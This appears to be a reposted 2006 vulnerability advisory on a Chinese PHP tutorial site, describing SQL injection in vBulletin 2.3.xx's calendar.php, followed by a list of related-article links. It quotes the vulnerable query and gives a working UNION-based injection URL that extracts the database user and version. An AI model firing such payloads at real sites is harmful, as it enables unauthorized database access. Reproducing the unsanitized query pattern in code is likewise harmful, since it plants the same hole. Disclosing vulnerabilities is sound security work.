vBulletin Forum 2.3.xx SQL Injection

更新時(shí)間：2006年10月09日 00:00:00 作者：

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

相關(guān)文章

PHP CURL CURLOPT參數(shù)說(shuō)明(curl_setopt)
這篇文章主要介紹了PHP CURL CURLOPT參數(shù)，需要的朋友可以參考下
2013-09-09
[PHP] 《PHP邊學(xué)邊教》(01.開(kāi)篇——準(zhǔn)備工作)
[PHP] 《PHP邊學(xué)邊教》(01.開(kāi)篇——準(zhǔn)備工作)...
2006-12-12
PDO::commit講解
今天小編就為大家分享一篇關(guān)于PDO::commit講解，小編覺(jué)得內(nèi)容挺不錯(cuò)的，現(xiàn)在分享給大家，具有很好的參考價(jià)值，需要的朋友一起跟隨小編來(lái)看看吧
2019-01-01
通過(guò)html表格發(fā)電子郵件
通過(guò)html表格發(fā)電子郵件...
2006-10-10
不用數(shù)據(jù)庫(kù)的多用戶文件自由上傳投票系統(tǒng)(1)
不用數(shù)據(jù)庫(kù)的多用戶文件自由上傳投票系統(tǒng)(1)...
2006-10-10
php面向?qū)ο笕ヂ?（十七）自動(dòng)加載類
多開(kāi)發(fā)者寫(xiě)面向?qū)ο蟮膽?yīng)用程序時(shí)，對(duì)每個(gè)類的定義建立一個(gè)PHP 源文件。一個(gè)很大的煩惱是不得不在每個(gè)腳本（每個(gè)類一個(gè)文件）開(kāi)頭寫(xiě)一個(gè)長(zhǎng)長(zhǎng)的包含文件的列表。
2009-09-09
初品cakephp 入門(mén)基礎(chǔ)
近段時(shí)間項(xiàng)目挺輕松的，剛好有時(shí)間來(lái)了解一下cakephp。下面只是一己之見(jiàn)，初識(shí)cakephp而已，完全不保證內(nèi)容的正確性
2012-02-02
2.PHP入門(mén)
2.PHP入門(mén)...
2006-10-10
論壇頭像隨機(jī)變換代碼
論壇頭像隨機(jī)變換代碼...
2006-10-10
PHP讀寫(xiě)文件的方法(生成HTML)
PHP讀寫(xiě)文件的方法(生成HTML)...
2006-11-11